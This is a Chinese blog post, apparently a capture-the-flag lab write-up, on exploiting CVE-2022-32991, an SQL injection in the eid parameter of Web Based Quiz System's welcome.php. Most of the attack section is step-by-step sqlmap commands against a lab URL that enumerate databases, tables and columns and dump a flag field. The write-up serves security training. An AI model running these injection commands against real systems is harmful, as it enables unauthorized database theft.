CVE-2022-32991 Web Based Quiz System SQL注入

最新推荐文章于 2024-03-25 23:13:52 发布
最新推荐文章于 2024-03-25 23:13:52 发布
阅读量632 收藏 2
点赞数
分类专栏: web渗透 数据库 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38733240/article/details/127935485
版权

靶标介绍

在Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。 受影响的是未知功能文件:welcome.php。 手动调试的软件参数:eid不合法输入可导致 SQL注入。
在这里插入图片描述

步骤

1. 注册登陆

在这里插入图片描述

2. sqlmap注入
1. 检查注入点
sqlmap -u 'http://eci-2ze05gfvp4qck2p94abx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34'

在这里插入图片描述

2. 爆破所有数据库信息
sqlmap -u 'http://eci-2ze05gfvp4qck2p94abx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' --dbs

sqlmap -u 'http://eci-2ze05gfvp4qck2p94abx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' --dbs --batch --random-agent -p eid

在这里插入图片描述

3. 爆破当前数据库信息
sqlmap -u 'http://eci-2ze05gfvp4qck2p94abx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' --current-db

在这里插入图片描述

4. 指定库名列出所有表
sqlmap -u 'http://eci-2ze05gfvp4qck2p94abx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -D ctf --tables

在这里插入图片描述

5. 指定库名列出所有字段
sqlmap -u 'http://eci-2ze05gfvp4qck2p94abx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -D ctf -T flag --columns

在这里插入图片描述

6. 指定库名表名字段dump指定字段
sqlmap -u 'http://eci-2ze05gfvp4qck2p94abx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -D ctf -T flag -C flag --dump
XuanyuWq
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web Based Quiz System SQL注入漏洞复现(CVE-2022-32991
千寻的博客
11-25 1027
`Sourcecodester Web Based Quiz System`是 (`Sourcecodester`)开源的一个应用软件。用于一个简单的在线基础的项目。 `Web Based Quiz System v1.0`版本存在安全漏洞,该漏洞源于通过` welcome.php `中的`eid` 参数发现存在 SQL 注入漏洞。该CMS的welcome.php中存在SQL注入攻击。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
CVE-2022-32991
最新发布
sinat_25635183的博客
03-25 292
2、CVE-2022-32991Web Based Quiz System v1.0版本中存在的SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。但是提示sqlmap的版本过时了, "your sqlmap version is outdated",那么就意味着你当前使用的 sqlmap版本可能已经不是最新版本,建议你及时更新到最新版本以确保工具的效用和安全性。使用sqlmap工具(本人使用的是kali下的sqlmap)猜测数据库为:ctf。
春秋云镜 免费空间 部分web题目
qq_73767109的博客
04-11 241
春秋云镜 靶场免费空间(持续更新) Web Based Quiz System SQL注入;Pharmacy Management System shell upload
【春秋云境.com】CVE-2022-32991通关思路
BG_ONE的博客
12-04 978
【春秋云境.com】CVE-2022-32991思路
sql注入漏洞(CVE-2022-32991
热门推荐
Battery的博客
09-10 6万+
CVE-2022-32991Web Based Quiz System v1.0版本中存在的SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。打开靶场环境,如下。
【春秋云境】CVE-2022-32991靶场wp
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
Web Based Quiz System SQL注入
weixin_46420165的博客
12-08 581
Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。受影响的是未知功能文件:welcome.php。手动调试的软件参数:eid不合法输入可导致 SQL注入 (漏洞地址在下面写出)
春秋云境:CVE-2022-32991SQL注入
m0_65712192的博客
04-12 1547
该CMS的welcome.php中存在SQL注入攻击。
[春秋云镜] CVE-2022-32991 靶场详解
weixin_60374959的博客
11-23 2089
本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。-p 指定注入的参数--batch 使用默认方法去执行sql注入--random-agent 随机更换请求头--user-agent 使用指定的请求头--cookie 使用指定cookie。
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
这是最近爆出来的一个 wordpress 的 SQL 注入漏洞,实际上不是一个可以直接利用的洞,而是wordpress 的一个核心函数 WP_Query 的漏洞,这个函数常被插件使用,因此能造成的危害也挺大,前台后台都有可能
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
Apache Spark 命令注入(CVE-2022-33891)格式化文档 Apache Spark 命令注入(CVE-2022-33891)漏洞复现 CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark ...
Web Based Quiz System SQL注入---CVE-2022-32991
m0_62959190的博客
08-24 125
很基础的sql注入,也是使用很基础SQL语句,在做这一题的时候没必要使用sqlmap跑了。所以在做题时,要灵活,不要只盯着一个点,多探测几个点总是好的。转移注意,页面内容有start按键,尝试按一下,出现新的页面。在url中有一个参数n,点击submit键参数n就变一下。尝试很多次想在参数q后面进行探测是否有漏洞,结果不行。出现报错,继续order by 一下。注册登录进来,页面如下。
【春秋云境】CVE-2022-32991
ZXW_NUDT的博客
02-22 2495
【春秋云境】CVE-2022-32991
CVE-2022-32991靶场复现
m0_73734159的博客
10-27 650
由于没有注入窗口,所以想到了,火狐+burpsuite+sqlmap组合拷打。复制带有eid参数的页面网址,用火狐浏览器打开,进行burpsuite抓包。箭头所指方向存在welcome.php文件但是参数不是eid,而是p。题目提示了该CMS的welcome.php中存在SQL注入攻击。welcome.php页面存在SQL注入,并且这个参数是eid。下方有Start开始按钮,点点试试,看看有没有新的发现。创建一个txt文件,将数据包复制到这个txt文件里面。注入前的准备工作,了解sqlmap的部分参数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值